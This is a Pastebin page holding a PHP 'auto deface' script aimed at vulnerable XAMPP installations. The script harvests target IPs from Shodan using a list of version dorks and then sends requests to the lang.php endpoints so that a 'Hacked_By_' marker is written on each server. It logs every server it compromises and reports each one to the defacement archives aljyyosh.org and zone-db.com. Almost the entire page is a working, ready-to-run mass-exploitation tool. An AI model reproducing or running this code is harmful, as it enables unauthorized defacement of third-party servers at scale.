API tools faq
paste
Advertisement
shor7cut

Auto Exploit : Xampp Lang (Fix)

shor7cut
Jul 25th, 2015
832
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.25 KB | None | 0 0
raw download clone embed print report
  1. // SET API CTRL +  F = $api = " ";
  2. // <code> by shor7CUT
  3.  
  4. <?php
  5. error_reporting(0);
  6. set_time_limit(0);
  7.  
  8. date_default_timezone_set('asia/jakarta');
  9. logos();
  10. cari_target();
  11.  
  12. function cari_target() {
  13. $time = microtime(true);
  14. $dork = array (
  15. 'xampp',
  16. 'xampp Apache/2.2.3',
  17. 'xampp Apache/2.2.4',
  18. 'xampp Apache/2.2.6',
  19. 'xampp Apache/2.2.8',
  20. 'xampp Apache/2.2.9',
  21. 'xampp Apache/2.2.11',
  22. 'xampp Apache/2.2.12',
  23. 'xampp Apache/2.2.14',
  24. 'xampp Apache/2.2.17',
  25. 'xampp Apache/2.2.21',
  26. 'xampp Apache/2.4.2',
  27. 'xampp Apache/2.4.3',
  28. 'xampp Apache/2.4.10',
  29. 'xampp Apache/2.4.12',
  30. 'xampp PHP/5.2.1',
  31. 'xampp PHP/5.2.2',
  32. 'xampp PHP/5.2.3',
  33. 'xampp PHP/5.2.4',
  34. 'xampp PHP/5.2.5',
  35. 'xampp PHP/5.2.6',
  36. 'xampp PHP/5.2.8',
  37. 'xampp PHP/5.2.9',
  38. 'xampp PHP/5.3.0',
  39. 'xampp PHP/5.3.1',
  40. 'xampp PHP/5.3.5',
  41. 'xampp PHP/5.3.8',
  42. 'xampp PHP/5.4.4',
  43. 'xampp PHP/5.4.7',
  44. 'xampp PHP/5.4.31',
  45. 'xampp PHP/5.5.15',
  46. 'xampp PHP/5.5.19',
  47. 'xampp PHP/5.6.3',
  48. 'xampp PHP/5.5.24',
  49. 'xampp PHP/5.6.8',
  50. 'xampp PHP/4.4.5',
  51. 'xampp PHP/4.4.6',
  52. 'xampp PHP/4.4.7',
  53. 'xampp PHP/4.4.8',
  54. 'xampp PHP/4.4.9'
  55. );
  56. $api = " ";
  57. $hacker = "Shor7cut";
  58. $name_log = "lang_log_xampp_mirror_zonedb.txt";
  59. $name_target = "lang_target_xampp_mirror_zonedb.txt";
  60. $name_result = "lang_result_xampp_mirror_zonedb.html";
  61. $name_lapor = "Laporan.txt";
  62. $no_Scan=1;
  63. $tanggal_scan= date("d-m-Y h:i:s a");
  64. $jumlah_vuln=0;
  65. $jumlah_target_baru=0;
  66. $jumlah_submit_success=0;
  67. $jumlah_submit_success_zdb=0;
  68. $mulai_scan=date_default_timezone_set('asia/jakarta');
  69. $total_dork = count($dork);
  70. $no=1;
  71.  
  72.  
  73. // Hapus File \\
  74. unlink("$name_target");
  75. //
  76.     echo "\r\n|+> Total Dork : ".$total_dork."\r\n";
  77.     echo "|+> Memulai Mencari target\r\n";
  78.     loading();
  79. foreach ($dork as $dorks) {
  80.     $noms = "[".$no_Scan."/".$total_dork."]";
  81.     echo "|+> Mencari Target : ".$noms."\r\n|+> Scanned in ";
  82.     $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
  83.     $json = json_decode($get,true);
  84.  
  85. foreach ($json['matches'] as $key => $value) {
  86.  
  87.         $fp = fopen($name_target, 'a+');
  88.         fwrite($fp, $value['ip_str']."|");
  89.         fclose($fp);
  90.  
  91.     } // End Foreach
  92.     $target_live = $json['total'];
  93.         if($target_live>100){
  94.             $target_live=100;
  95.         }
  96.     $total_target=$target_live+$total_target;
  97.     echo ceil((microtime(true)-$time))." Detik\r\n|+> Found Target : [".$target_live."]\r\n\n";
  98.  
  99.     $no_Scan++;
  100. }
  101. echo "[+] Total Target : [".$total_target."]\r\n";
  102. $buka_file = fopen($name_target, "r");
  103. $baca_file = fgets($buka_file);
  104. $target = explode("|", $baca_file);
  105. echo "[+] Memulai Mencari vulnerable\r\n";
  106. loading()."\r\n\n";
  107. foreach ($target as $sites) {
  108. echo "-> Info : [".$no."/".$total_target."] : ".$sites."\r\n-> Status : "; //pesan
  109. $link1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  110. $link2 = "$sites/security/lang.php?Hacked_By_$hacker";
  111. $link1_result = "$sites/xampp/lang.tmp?";
  112. $link2_result = "$sites/security/lang.tmp?";
  113.  
  114. $xamppcurl = curl_init("$link1");
  115. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  116. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  117. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  118. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  119. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  120. $result1 = curl_exec($xamppcurl);
  121.  
  122. $xamppcur2 = curl_init("$link2");
  123. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  124. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  125. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  126. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  127. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  128. $result2 = curl_exec($xamppcur2);
  129.  
  130. if(eregi("Hacked_By_",$result1))
  131. {   echo "vulnerable\r\n";
  132.     $log = "http://$link1_result";
  133.     $hasil = '<a href="http://'.$link1_result.' target="_blank">http://'.$link1_result.'</a><br>';
  134.     $buka_file = fopen($name_log, "r"); // membaca file log
  135.     $baca_file = fgets($buka_file);
  136.        
  137.  
  138.         $buka_file = file_get_contents($name_log);
  139.   if(!eregi($sites, $buka_file)){
  140.         //save result
  141.         $fp = fopen($name_result, 'a+');
  142.         fwrite($fp, $hasil);
  143.         fclose($fp);
  144.         //save log
  145.         $fp = fopen($name_log, 'a+');
  146.         fwrite($fp, $sites."\r\n");
  147.         fclose($fp);
  148.         echo "-> Save-DB : Telah Ditambahkan\r\n";
  149.                 $jumlah_vuln++;
  150.                 $jumlah_target_baru++;
  151.   }else {
  152.         echo "-> Save-DB : Tidak Ditambahkan\r\n";
  153.   }
  154.                            
  155.        
  156.  
  157.  
  158.                 $cubit = curl_init ();
  159.                 curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  160.                 curl_setopt ($cubit, CURLOPT_POST, 1);
  161.                 curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  162.                 curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  163.                 curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$hacker&site=$hasil&how=1&why=1&addsite=Send");
  164.                 if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  165.                     echo "-> Submit Mirror [aljyyosh] : Success\r\n";
  166.                     $jumlah_submit_success++;
  167.                 }else {
  168.                     echo "-> Submit Mirror [aljyyosh] : Fail\r\n";
  169.                 }
  170.  
  171. $post = array(
  172. "hacker" => "$hacker",
  173. "team" => "IndoXploit",
  174. "url" => "$hasil",
  175. "poc" => "Other Web Application Bug",
  176. "key" => "kucing",
  177. "secret" => "tai",
  178. );
  179.     $cubits = curl_init ("http://zone-db.com/notify_act.php");
  180.     curl_setopt($cubits, CURLOPT_HEADER, 1);
  181.     curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  182.     curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  183.     curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  184.     curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  185.     curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  186.     curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  187.     curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  188.     curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  189.     curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  190.     $result_mirror = curl_exec($cubits);
  191.  
  192.                         if (preg_match("#added#is", $result_mirror)){
  193.                                 echo "-> Submit Mirror [zone-db] : Success\r\n\n";
  194.                                 $jumlah_submit_success++;
  195.                                 $jumlah_submit_success_zdb++;
  196.                         }else{
  197.                                 echo "-> Submit Mirror [zone-db] : Fail\r\n\n";
  198.                         }
  199.  
  200.  
  201.  
  202. }else if(eregi("Hacked_By_",$result2))
  203. {   echo "vulnerable\r\n";
  204.     $log = "http://$link2_result";
  205.     $hasil = '<a href="http://'.$link2_result.' target="_blank>http://'.$link2_result.'</a><br>';
  206.     $buka_file = fopen($name_log, "r"); // membaca file log
  207.     $baca_file = fgets($buka_file);
  208.                                        
  209.  
  210.         $buka_file = file_get_contents($name_log);
  211.      if(!eregi($sites, $buka_file)){
  212.         //save result
  213.         $fp = fopen($name_result, 'a+');
  214.         fwrite($fp, $hasil);
  215.         fclose($fp);
  216.         //save log
  217.         $fp = fopen($name_log, 'a+');
  218.         fwrite($fp, $sites."\r\n");
  219.         fclose($fp);
  220.         echo "-> Save-DB : Telah Ditambahkan\r\n";
  221.         $jumlah_vuln++;
  222.         $jumlah_target_baru++;
  223.     }else {
  224.         echo "-> Save-DB : Tidak Ditambahkan\r\n";
  225.     }
  226.  
  227.  
  228.  
  229.                                          $cubit = curl_init ();
  230.                                         curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  231.                                         curl_setopt ($cubit, CURLOPT_POST, 1);
  232.                                         curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  233.                                         curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  234.                                         curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$hacker&site=$hasil&how=1&why=1&addsite=Send");
  235.                                         if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  236.                                             echo "-> Submit Mirror [aljyyosh] : Success\r\n";
  237.                                             $jumlah_submit_success++;
  238.                                         }else {
  239.                                             echo "-> Submit Mirror [aljyyosh] : Fail\r\n";
  240.                                         }
  241.                                        
  242.  
  243.  
  244. $post = array(
  245. "hacker" => "$hacker",
  246. "team" => "IndoXploit",
  247. "url" => "$hasil",
  248. "poc" => "Other Web Application Bug",
  249. "key" => "kucing",
  250. "secret" => "tai",
  251. );
  252.     $cubits = curl_init ("http://zone-db.com/notify_act.php");
  253.     curl_setopt($cubits, CURLOPT_HEADER, 1);
  254.     curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  255.     curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  256.     curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  257.     curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  258.     curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  259.     curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  260.     curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  261.     curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  262.     curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  263.     $result_mirror = curl_exec($cubits);
  264.  
  265.                         if (preg_match("#added#is", $result_mirror)){
  266.                                 echo "-> Submit Mirror [zone-db] : Success\r\n\n";
  267.                                 $jumlah_submit_success++;
  268.                                 $jumlah_submit_success_zdb++;
  269.                         }else{
  270.                                 echo "-> Submit Mirror [zone-db] : Fail\r\n\n";
  271.                         }
  272.  
  273.  
  274.  
  275.  
  276. }else {
  277.     echo "not vulnerable\r\n\n";
  278.     }
  279.  
  280. $no++;
  281. } //end:foreach|sites
  282.         $lapor.= "\r\n------------[ZONE DB MIRROR]-----------------\r\n";
  283.         $lapor.= "-> Laporan : ".$tanggal_scan."\r\n";
  284.         $lapor.= "-> Total Target  : ".$total_target."\r\n";
  285.         $lapor.= "-> Total Database Baru : ".$jumlah_target_baru."\r\n";
  286.         $lapor.= "-> Total Success Submit aljyyosh/zone-db: ".$jumlah_submit_success."|".$jumlah_submit_success_zdb++."\r\n";
  287.         $lapor.= "-> Scan End : ".date("d-m-Y h:i:s a")."\r\n";
  288.         $lapor.= "\r\n-----------------------------\r\n";
  289.         echo $lapor;
  290.         $fp = fopen($name_lapor, 'a+');
  291.         fwrite($fp, $lapor);
  292.         fclose($fp);
  293.         reload_manunisi();
  294.     } //end:fungsi
  295.  
  296.                
  297.  
  298. function logos() {
  299. $logos.="  _________.__                _________               __    \r\n";
  300. $logos.=" /   _____/|  |__   __________\______  \ ____  __ ___/  |_  \r\n";
  301. $logos.=" \_____  \ |  |  \ /  _ \_  __ \  /    // ___\|  |  \   __\ \r\n";
  302. $logos.=" /        \|   Y  (  <_> )  | \/ /    /\  \___|  |  /|  |   \r\n";
  303. $logos.="/_______  /|___|  /\____/|__|   /____/  \___  >____/ |__|   \r\n";
  304. $logos.="        \/      \/                          \/              \r\n";
  305. $logos.="---------[ Auto Deface (Xampp Lang.php) by Shor7cut ]-------\r\n";
  306. echo $logos;
  307. }
  308. function reload_manunisi() {
  309. cari_target();
  310. }
  311.  
  312. function loading() {
  313.     echo "-> Pleas wait ";
  314. for ($i=0; $i <3; $i++) {
  315.         echo ".";
  316.         sleep(1);
  317.         echo " ";
  318.         sleep(1);
  319. }   echo "\r\n\n";
  320.     }
  321.  
  322.     ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!